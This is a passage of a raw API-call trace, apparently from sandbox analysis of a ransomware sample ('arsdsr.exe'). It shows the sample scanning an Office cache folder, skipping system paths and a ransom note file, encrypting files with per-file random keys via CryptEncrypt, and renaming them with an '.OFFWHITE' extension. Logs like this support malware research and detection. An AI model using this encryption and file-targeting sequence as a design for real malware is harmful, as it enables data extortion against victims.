lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.396] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.396] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0082.402] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.402] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.402] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0082.402] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0082.402] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0082.402] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0082.402] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0082.402] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0082.402] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0082.403] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0082.403] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0082.403] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0082.403] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0082.403] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0082.403] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0082.403] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0016-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" [0082.403] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0082.403] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0082.403] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" [0082.403] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0082.404] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.404] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0082.404] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.404] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.404] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0082.404] lstrcmpiW (lpString1="ExcelLR.cab", lpString2=".") returned 1 [0082.404] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="..") returned 1 [0082.404] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="...") returned 1 [0082.404] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="windows") returned -1 [0082.404] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="$recycle.bin") returned 1 [0082.404] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="rsa") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="ntuser.dat") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="programdata") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="appdata") returned 1 [0082.405] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="program files") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="program files (x86)") returned -1 [0082.405] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0082.405] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="ExcelLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0082.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.405] PathFindExtensionW (pszPath="ExcelLR.cab") returned=".cab" [0082.405] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0082.405] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0082.405] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0082.405] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2=".") returned 1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="..") returned 1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="...") returned 1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="windows") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="$recycle.bin") returned 1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="rsa") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="ntuser.dat") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="programdata") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="appdata") returned 1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="program files") returned -1 [0082.405] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="program files (x86)") returned -1 [0082.405] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0082.406] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="ExcelMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" [0082.406] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.406] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.406] PathFindExtensionW (pszPath="ExcelMUI.msi") returned=".msi" [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0082.406] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0082.406] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2=".") returned 1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="..") returned 1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="...") returned 1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="windows") returned -1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="$recycle.bin") returned 1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="rsa") returned -1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="ntuser.dat") returned -1 [0082.406] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="programdata") returned -1 [0082.407] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="appdata") returned 1 [0082.407] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="program files") returned -1 [0082.407] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="program files (x86)") returned -1 [0082.407] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0082.407] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="ExcelMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" [0082.407] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.407] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.407] PathFindExtensionW (pszPath="ExcelMUI.xml") returned=".xml" [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0082.407] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.407] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.407] GetProcessHeap () returned 0x500000 [0082.407] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd80 [0082.408] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0082.409] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1565) returned 1 [0082.409] GetProcessHeap () returned 0x500000 [0082.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0082.409] GetProcessHeap () returned 0x500000 [0082.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0082.409] GetProcessHeap () returned 0x500000 [0082.410] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0082.410] GetProcessHeap () returned 0x500000 [0082.410] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0082.410] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.410] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.410] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0082.410] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.410] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.410] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0082.410] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.410] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.410] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0082.410] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.410] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.410] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0082.411] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x61d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.411] SetLastError (dwErrCode=0x0) [0082.411] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.416] GetLastError () returned 0x0 [0082.416] GetLastError () returned 0x0 [0082.416] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x71d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.416] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.416] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x81d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.416] WriteFile (in: hFile=0x21c, lpBuffer=0x52bd80*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bd80*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0082.416] GetProcessHeap () returned 0x500000 [0082.416] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x61d) returned 0x546980 [0082.417] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.417] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x61d, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x61d, lpOverlapped=0x0) returned 1 [0082.417] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.417] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x61d, lpOverlapped=0x0) returned 1 [0082.417] GetProcessHeap () returned 0x500000 [0082.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0082.417] CloseHandle (hObject=0x21c) returned 1 [0082.418] GetProcessHeap () returned 0x500000 [0082.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0082.418] GetProcessHeap () returned 0x500000 [0082.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0082.418] GetProcessHeap () returned 0x500000 [0082.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0082.418] GetProcessHeap () returned 0x500000 [0082.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0082.418] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" [0082.419] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.OFFWHITE" [0082.419] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.offwhite")) returned 1 [0082.421] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0082.421] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0082.422] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0082.422] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0082.422] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0082.422] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0082.422] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" [0082.423] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.423] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.423] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0082.423] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.423] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0082.423] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0082.424] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.424] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0082.424] GetProcessHeap () returned 0x500000 [0082.424] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd40 [0082.424] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0082.425] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=2296) returned 1 [0082.425] GetProcessHeap () returned 0x500000 [0082.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0082.425] GetProcessHeap () returned 0x500000 [0082.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0082.425] GetProcessHeap () returned 0x500000 [0082.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0082.426] GetProcessHeap () returned 0x500000 [0082.426] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0082.426] lstrcmpiW 